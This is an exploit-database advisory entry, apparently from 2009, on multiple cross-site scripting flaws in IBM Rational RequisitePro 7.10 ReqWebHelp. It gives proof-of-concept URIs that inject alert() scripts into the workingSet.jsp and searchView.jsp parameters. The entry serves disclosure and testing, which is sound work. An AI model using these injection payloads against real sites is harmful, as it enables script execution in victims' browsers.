[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting
# Published : 2009-10-15
# Author : IBM
# Previous Title : Pentaho <= 1.7.0.1062 xss and information disclosure
# Next Title : Achievo <= 1.3.4 xss
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>